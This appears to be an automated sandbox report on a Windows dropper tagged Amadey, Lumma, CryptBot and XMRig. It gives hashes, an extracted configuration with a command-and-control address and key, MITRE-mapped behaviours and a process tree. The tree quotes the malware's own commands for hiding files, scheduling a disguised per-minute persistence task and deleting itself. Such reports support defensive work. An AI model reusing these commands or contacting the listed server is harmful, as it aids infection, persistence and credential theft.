amadey | ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249

Analysis

max time kernel
142s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17/12/2024, 16:44 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe
Size

2.8MB
MD5

bf03b982421c50b3c232a902eed53e31
SHA1

5f1bdec3bf5ef51e982ebd35ef62d4ab461891bd
SHA256

ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249
SHA512

dd77759327f5bac2cbb935de95e4d9c57931a548715fb7de041d8367b4e98a0ef2476577d399ef2c84a9b2f26516abf579575949bfd7917bd83ce2f9f91fdfd1
SSDEEP

49152:nvzSPYPGhM06DbXnnIMgFsXK5vQxw6oO:n7SPYPG206DcMCsa5vQKPO

Score

10^/10

amadey cryptbot lumma xmrig 9c9aa5 discovery evasion miner spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

Extracted

Family

cryptbot

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
Cryptbot family
cryptbot
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4732 created 2712	4732	68a321b9be.exe	45

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	e9af4c7f3b.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	68a321b9be.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e9af4c7f3b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	475ff6d638.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

XMRig Miner payload 13 IoCs

miner

resource	yara_rule
behavioral2/memory/3064-221-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3064-222-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3064-223-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3064-224-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3064-225-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3064-227-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3064-226-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3064-230-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3064-232-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3064-236-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3976-265-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3976-267-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral2/memory/3976-271-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e9af4c7f3b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	475ff6d638.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	68a321b9be.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	475ff6d638.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e9af4c7f3b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	68a321b9be.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	8ff44bb8e2.exe

Executes dropped EXE 20 IoCs

pid	Process
2756	skotes.exe
2200	8ff44bb8e2.exe
3532	7z.exe
844	7z.exe
4128	7z.exe
1912	7z.exe
1312	7z.exe
2636	7z.exe
2424	7z.exe
3464	7z.exe
4900	in.exe
4732	68a321b9be.exe
4008	43cf0fb499.exe
2108	43cf0fb499.exe
1192	e9af4c7f3b.exe
3744	475ff6d638.exe
4648	skotes.exe
3556	Intel_PTT_EK_Recertification.exe
4700	skotes.exe
2348	Intel_PTT_EK_Recertification.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	68a321b9be.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	e9af4c7f3b.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	475ff6d638.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine	skotes.exe

Loads dropped DLL 8 IoCs

pid	Process
3532	7z.exe
844	7z.exe
4128	7z.exe
1912	7z.exe
1312	7z.exe
2636	7z.exe
2424	7z.exe
3464	7z.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
4720	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe
2756	skotes.exe
4732	68a321b9be.exe
1192	e9af4c7f3b.exe
3744	475ff6d638.exe
4648	skotes.exe
4700	skotes.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4008 set thread context of 2108	4008	43cf0fb499.exe	122
PID 3556 set thread context of 3064	3556	Intel_PTT_EK_Recertification.exe	135
PID 2348 set thread context of 3976	2348	Intel_PTT_EK_Recertification.exe	142

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cc9-110.dat	upx
behavioral2/memory/4900-112-0x00007FF645730000-0x00007FF645BC0000-memory.dmp	upx
behavioral2/memory/4900-114-0x00007FF645730000-0x00007FF645BC0000-memory.dmp	upx
behavioral2/memory/3556-219-0x00007FF79C520000-0x00007FF79C9B0000-memory.dmp	upx
behavioral2/memory/3556-229-0x00007FF79C520000-0x00007FF79C9B0000-memory.dmp	upx
behavioral2/memory/2348-270-0x00007FF79C520000-0x00007FF79C9B0000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2468	4732	WerFault.exe	111

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	43cf0fb499.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8ff44bb8e2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	43cf0fb499.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	68a321b9be.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e9af4c7f3b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	475ff6d638.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1680	powershell.exe
4100	PING.EXE
4072	powershell.exe
3136	PING.EXE
4644	powershell.exe
3888	PING.EXE

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
3888	PING.EXE
4100	PING.EXE
3136	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1104	schtasks.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
4720	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe
4720	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe
2756	skotes.exe
2756	skotes.exe
1680	powershell.exe
1680	powershell.exe
4732	68a321b9be.exe
4732	68a321b9be.exe
4732	68a321b9be.exe
4732	68a321b9be.exe
4732	68a321b9be.exe
4732	68a321b9be.exe
1120	svchost.exe
1120	svchost.exe
1120	svchost.exe
1120	svchost.exe
2108	43cf0fb499.exe
2108	43cf0fb499.exe
2108	43cf0fb499.exe
2108	43cf0fb499.exe
1192	e9af4c7f3b.exe
1192	e9af4c7f3b.exe
1192	e9af4c7f3b.exe
1192	e9af4c7f3b.exe
1192	e9af4c7f3b.exe
1192	e9af4c7f3b.exe
1192	e9af4c7f3b.exe
1192	e9af4c7f3b.exe
1192	e9af4c7f3b.exe
1192	e9af4c7f3b.exe
3744	475ff6d638.exe
3744	475ff6d638.exe
4648	skotes.exe
4648	skotes.exe
3556	Intel_PTT_EK_Recertification.exe
4072	powershell.exe
4072	powershell.exe
2348	Intel_PTT_EK_Recertification.exe
4700	skotes.exe
4700	skotes.exe
4644	powershell.exe
4644	powershell.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeRestorePrivilege	3532	7z.exe
Token: 35	3532	7z.exe
Token: SeSecurityPrivilege	3532	7z.exe
Token: SeSecurityPrivilege	3532	7z.exe
Token: SeRestorePrivilege	844	7z.exe
Token: 35	844	7z.exe
Token: SeSecurityPrivilege	844	7z.exe
Token: SeSecurityPrivilege	844	7z.exe
Token: SeRestorePrivilege	4128	7z.exe
Token: 35	4128	7z.exe
Token: SeSecurityPrivilege	4128	7z.exe
Token: SeSecurityPrivilege	4128	7z.exe
Token: SeRestorePrivilege	1912	7z.exe
Token: 35	1912	7z.exe
Token: SeSecurityPrivilege	1912	7z.exe
Token: SeSecurityPrivilege	1912	7z.exe
Token: SeRestorePrivilege	1312	7z.exe
Token: 35	1312	7z.exe
Token: SeSecurityPrivilege	1312	7z.exe
Token: SeSecurityPrivilege	1312	7z.exe
Token: SeRestorePrivilege	2636	7z.exe
Token: 35	2636	7z.exe
Token: SeSecurityPrivilege	2636	7z.exe
Token: SeSecurityPrivilege	2636	7z.exe
Token: SeRestorePrivilege	2424	7z.exe
Token: 35	2424	7z.exe
Token: SeSecurityPrivilege	2424	7z.exe
Token: SeSecurityPrivilege	2424	7z.exe
Token: SeRestorePrivilege	3464	7z.exe
Token: 35	3464	7z.exe
Token: SeSecurityPrivilege	3464	7z.exe
Token: SeSecurityPrivilege	3464	7z.exe
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeLockMemoryPrivilege	3064	explorer.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeLockMemoryPrivilege	3976	explorer.exe
Token: SeDebugPrivilege	4644	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4720	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4720 wrote to memory of 2756	4720	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe	83
PID 4720 wrote to memory of 2756	4720	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe	83
PID 4720 wrote to memory of 2756	4720	ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe	83
PID 2756 wrote to memory of 2200	2756	skotes.exe	85
PID 2756 wrote to memory of 2200	2756	skotes.exe	85
PID 2756 wrote to memory of 2200	2756	skotes.exe	85
PID 2200 wrote to memory of 5008	2200	8ff44bb8e2.exe	86
PID 2200 wrote to memory of 5008	2200	8ff44bb8e2.exe	86
PID 5008 wrote to memory of 1896	5008	cmd.exe	88
PID 5008 wrote to memory of 1896	5008	cmd.exe	88
PID 5008 wrote to memory of 3532	5008	cmd.exe	89
PID 5008 wrote to memory of 3532	5008	cmd.exe	89
PID 5008 wrote to memory of 844	5008	cmd.exe	92
PID 5008 wrote to memory of 844	5008	cmd.exe	92
PID 5008 wrote to memory of 4128	5008	cmd.exe	93
PID 5008 wrote to memory of 4128	5008	cmd.exe	93
PID 5008 wrote to memory of 1912	5008	cmd.exe	94
PID 5008 wrote to memory of 1912	5008	cmd.exe	94
PID 5008 wrote to memory of 1312	5008	cmd.exe	95
PID 5008 wrote to memory of 1312	5008	cmd.exe	95
PID 5008 wrote to memory of 2636	5008	cmd.exe	96
PID 5008 wrote to memory of 2636	5008	cmd.exe	96
PID 5008 wrote to memory of 2424	5008	cmd.exe	97
PID 5008 wrote to memory of 2424	5008	cmd.exe	97
PID 5008 wrote to memory of 3464	5008	cmd.exe	98
PID 5008 wrote to memory of 3464	5008	cmd.exe	98
PID 5008 wrote to memory of 4736	5008	cmd.exe	99
PID 5008 wrote to memory of 4736	5008	cmd.exe	99
PID 5008 wrote to memory of 4900	5008	cmd.exe	100
PID 5008 wrote to memory of 4900	5008	cmd.exe	100
PID 4900 wrote to memory of 5092	4900	in.exe	101
PID 4900 wrote to memory of 5092	4900	in.exe	101
PID 4900 wrote to memory of 1784	4900	in.exe	102
PID 4900 wrote to memory of 1784	4900	in.exe	102
PID 4900 wrote to memory of 1104	4900	in.exe	103
PID 4900 wrote to memory of 1104	4900	in.exe	103
PID 4900 wrote to memory of 1680	4900	in.exe	104
PID 4900 wrote to memory of 1680	4900	in.exe	104
PID 1680 wrote to memory of 4100	1680	powershell.exe	109
PID 1680 wrote to memory of 4100	1680	powershell.exe	109
PID 2756 wrote to memory of 4732	2756	skotes.exe	111
PID 2756 wrote to memory of 4732	2756	skotes.exe	111
PID 2756 wrote to memory of 4732	2756	skotes.exe	111
PID 4732 wrote to memory of 1120	4732	68a321b9be.exe	116
PID 4732 wrote to memory of 1120	4732	68a321b9be.exe	116
PID 4732 wrote to memory of 1120	4732	68a321b9be.exe	116
PID 4732 wrote to memory of 1120	4732	68a321b9be.exe	116
PID 4732 wrote to memory of 1120	4732	68a321b9be.exe	116
PID 2756 wrote to memory of 4008	2756	skotes.exe	120
PID 2756 wrote to memory of 4008	2756	skotes.exe	120
PID 2756 wrote to memory of 4008	2756	skotes.exe	120
PID 4008 wrote to memory of 2108	4008	43cf0fb499.exe	122
PID 4008 wrote to memory of 2108	4008	43cf0fb499.exe	122
PID 4008 wrote to memory of 2108	4008	43cf0fb499.exe	122
PID 4008 wrote to memory of 2108	4008	43cf0fb499.exe	122
PID 4008 wrote to memory of 2108	4008	43cf0fb499.exe	122
PID 4008 wrote to memory of 2108	4008	43cf0fb499.exe	122
PID 4008 wrote to memory of 2108	4008	43cf0fb499.exe	122
PID 4008 wrote to memory of 2108	4008	43cf0fb499.exe	122
PID 4008 wrote to memory of 2108	4008	43cf0fb499.exe	122
PID 2756 wrote to memory of 1192	2756	skotes.exe	128
PID 2756 wrote to memory of 1192	2756	skotes.exe	128
PID 2756 wrote to memory of 1192	2756	skotes.exe	128
PID 2756 wrote to memory of 3744	2756	skotes.exe	132

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4736	attrib.exe
1784	attrib.exe
5092	attrib.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2712
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1120

C:\Users\Admin\AppData\Local\Temp\ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe
"C:\Users\Admin\AppData\Local\Temp\ad8773dd53db992fecf9988cbedeea0a42e899995030766e4314fbb752b67249.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4720
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Users\Admin\AppData\Local\Temp\1016686001\8ff44bb8e2.exe
    "C:\Users\Admin\AppData\Local\Temp\1016686001\8ff44bb8e2.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5008
    - - C:\Windows\system32\mode.com
        
        mode 65,10
        5⤵
        
        PID:1896
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p24291711423417250691697322505 -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3532
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:844
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:4128
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1312
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2424
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3464
    - - C:\Windows\system32\attrib.exe
        
        attrib +H "in.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4736
    - - C:\Users\Admin\AppData\Local\Temp\main\in.exe
        
        "in.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4900
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        6⤵
        Views/modifies file attributes
        
        PID:5092
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        6⤵
        Views/modifies file attributes
        
        PID:1784
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1104
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell ping 127.0.0.1; del in.exe
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1680
        
        C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4100
- - C:\Users\Admin\AppData\Local\Temp\1016687001\68a321b9be.exe
    "C:\Users\Admin\AppData\Local\Temp\1016687001\68a321b9be.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4732
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4732 -s 536
      4⤵
      Program crash
      PID:2468
- - C:\Users\Admin\AppData\Local\Temp\1016688001\43cf0fb499.exe
    "C:\Users\Admin\AppData\Local\Temp\1016688001\43cf0fb499.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4008
  - - C:\Users\Admin\AppData\Local\Temp\1016688001\43cf0fb499.exe
      "C:\Users\Admin\AppData\Local\Temp\1016688001\43cf0fb499.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2108
- - C:\Users\Admin\AppData\Local\Temp\1016689001\e9af4c7f3b.exe
    "C:\Users\Admin\AppData\Local\Temp\1016689001\e9af4c7f3b.exe"
    3⤵
    - Enumerates VirtualBox registry keys
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\1016690001\475ff6d638.exe
    "C:\Users\Admin\AppData\Local\Temp\1016690001\475ff6d638.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4732 -ip 4732
1⤵
PID:3560

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4648

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3556
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4072
- - C:\Windows\system32\PING.EXE
    "C:\Windows\system32\PING.EXE" 127.1.10.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3136

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4700

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
1⤵
- Executes dropped EXE
